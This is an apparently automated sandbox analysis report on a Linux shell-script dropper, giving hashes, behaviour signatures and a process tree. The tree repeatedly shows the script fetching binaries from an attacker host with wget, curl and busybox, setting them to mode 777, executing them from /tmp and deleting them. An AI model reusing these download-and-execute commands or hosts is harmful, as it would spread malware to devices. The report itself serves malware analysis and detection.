Analysis
-
max time kernel
138s -
max time network
137s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipsel image:debian9-mipsel-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
18/10/2024, 02:06
Static task
static1
Behavioral task
behavioral1
Sample
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
-
Size
10KB
-
MD5
f6e271e4d94f1fe16e461104ef8f736a
-
SHA1
dc7560e563611fd68f908f9baad26d7487947976
-
SHA256
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da
-
SHA512
4435d20a9257c676d12aecdcca5eee355e04974d3429277c941b97658f8cefb32bc6b77fa47934d12ff9dc7d5457e3ab6a4ae80e4b7fa206d9ac58a61c02b084
-
SSDEEP
192:so4QVCOCkSMFkqcTZx45O4QVCOoZx4MF1:sFkJFkqcTZx4RZx4MF1
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
-
File opened for reading: /proc/sys/crypto/fips_enabled (process: curl)
-
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh1⤵PID:717
-
/bin/rm/bin/rm bins.sh2⤵PID:721
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- System Network Configuration Discovery
PID:728
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- System Network Configuration Discovery
PID:746
-
-
/bin/chmodchmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵PID:749
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵PID:750
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- System Network Configuration Discovery
PID:757
-
-
/bin/chmodchmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵PID:769
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- System Network Configuration Discovery
PID:770
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:778
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- System Network Configuration Discovery
PID:792
-
-
/bin/chmodchmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵PID:841
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵PID:842
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- System Network Configuration Discovery
PID:845
-
-
/bin/chmodchmod 777 JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O./JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵PID:848
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- System Network Configuration Discovery
PID:849
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- System Network Configuration Discovery
PID:852
-
-
/bin/chmodchmod 777 ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ./ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵PID:855
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- System Network Configuration Discovery
PID:856
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- System Network Configuration Discovery
PID:859
-
-
/bin/chmodchmod 777 OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4./OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- System Network Configuration Discovery
PID:866
-
-
/bin/chmodchmod 777 dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP./dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- System Network Configuration Discovery
PID:873
-
-
/bin/chmodchmod 777 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U./4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- System Network Configuration Discovery
PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵PID:880
-
-
/bin/chmodchmod 777 M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx./M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- System Network Configuration Discovery
PID:887
-
-
/bin/chmodchmod 777 UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ./UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵PID:894
-
-
/bin/chmodchmod 777 NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP./NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵PID:897
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- System Network Configuration Discovery
PID:898
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/chmodchmod 777 oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf./oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵PID:904
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- System Network Configuration Discovery
PID:905
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- System Network Configuration Discovery
PID:908
-
-
/bin/chmodchmod 777 NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU./NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵PID:911
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- System Network Configuration Discovery
PID:912
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- System Network Configuration Discovery
PID:915
-
-
/bin/chmodchmod 777 uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe./uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵PID:918
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- System Network Configuration Discovery
PID:919
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- System Network Configuration Discovery
PID:922
-
-
/bin/chmodchmod 777 M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx./M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- System Network Configuration Discovery
PID:929
-
-
/bin/chmodchmod 777 OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4./OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵PID:932
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵PID:933
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- System Network Configuration Discovery
PID:936
-
-
/bin/chmodchmod 777 dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP./dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵PID:939
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- System Network Configuration Discovery
PID:940
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- System Network Configuration Discovery
PID:943
-
-
/bin/chmodchmod 777 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U./4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵PID:946
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- System Network Configuration Discovery
PID:947
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵PID:950
-
-
/bin/chmodchmod 777 uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe./uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe2⤵PID:953
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- System Network Configuration Discovery
PID:954
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵PID:957
-
-
/bin/chmodchmod 777 UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ./UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵PID:960
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- System Network Configuration Discovery
PID:961
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- System Network Configuration Discovery
PID:964
-
-
/bin/chmodchmod 777 NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP./NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- System Network Configuration Discovery
PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- System Network Configuration Discovery
PID:971
-
-
/bin/chmodchmod 777 oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf./oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵PID:974
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵PID:975
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- System Network Configuration Discovery
PID:978
-
-
/bin/chmodchmod 777 NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU./NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU2⤵PID:981
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- System Network Configuration Discovery
PID:982
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵PID:985
-
-
/bin/chmodchmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵PID:988
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- System Network Configuration Discovery
PID:989
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:990
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- System Network Configuration Discovery
PID:992
-
-
/bin/chmodchmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- File and Directory Permissions Modification
PID:993
-
-
/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- Executes dropped EXE
PID:994
-
-
/bin/rmrm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵PID:995
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵PID:996
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:997
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵PID:999
-
-
/bin/chmodchmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- File and Directory Permissions Modification
PID:1000
-
-
/tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- Executes dropped EXE
PID:1001
-
-
/bin/rmrm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵PID:1002
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- System Network Configuration Discovery
PID:1003
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1004
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- System Network Configuration Discovery
PID:1006
-
-
/bin/chmodchmod 777 ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- File and Directory Permissions Modification
PID:1007
-
-
/tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ./ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- Executes dropped EXE
PID:1008
-
-
/bin/rmrm ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵PID:1009
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- System Network Configuration Discovery
PID:1010
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1011
-
-
